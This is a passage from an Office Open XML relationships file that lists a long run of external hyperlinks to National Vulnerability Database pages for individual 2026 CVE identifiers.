Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69328" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69348" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69352" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69359" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69368" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69377" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69389" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69391" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69392" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69407" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69420" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69421" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69424" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69426" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69432" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69433" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69436" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69444" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69445" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69447" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69450" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69455" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69456" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69459" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69467" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69475" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69476" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69478" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69480" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69489" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69508" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69509" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69513" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69528" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69532" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69534" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69535" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69538" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69541" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69542" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69544" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69561" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69571" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69576" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69580" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69582" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69583" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69584" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69585" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69589" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69592" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69593" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69594" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69604" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69608" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69612" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69685" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69687" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69691" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69707" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69709" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69720" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69725" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69731" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69738" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69758" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69785" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69787" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69790" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69799" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69801" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69821" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69822" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69841" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69844" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69864" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69900" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69907" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69921" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70289" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70334" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70564" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70569" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70572" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70574" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70581" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70583" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70584" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71334" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71337" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71343" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71345" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72929" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72941" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72944" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72946" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72953" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72957" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72965" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72967" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72988" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72990" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72991" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72992" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72993" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72994" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72995" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72996" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72997" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73000" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73001" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73002" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73007" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73011" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73014" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73015" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73020" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73021" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73024" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73026" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7476" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7477" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75631" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75771" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75862" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75863" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75992" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76967" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77091" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77489" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77500" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77503" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77904" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78447" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78448" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79907" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79908" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79909" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80075" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80161" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81353" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81386" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81388" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81396" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81397" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81398" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81947" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81948" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81949" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81950" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81951" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81953" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81954" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81956" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81957" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81959" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81960" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81973" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81975" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81976" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81979" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81980" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81981" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81983" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81985" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81986" TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81987" TargetMode="External" Id="rId663" /><Relationship 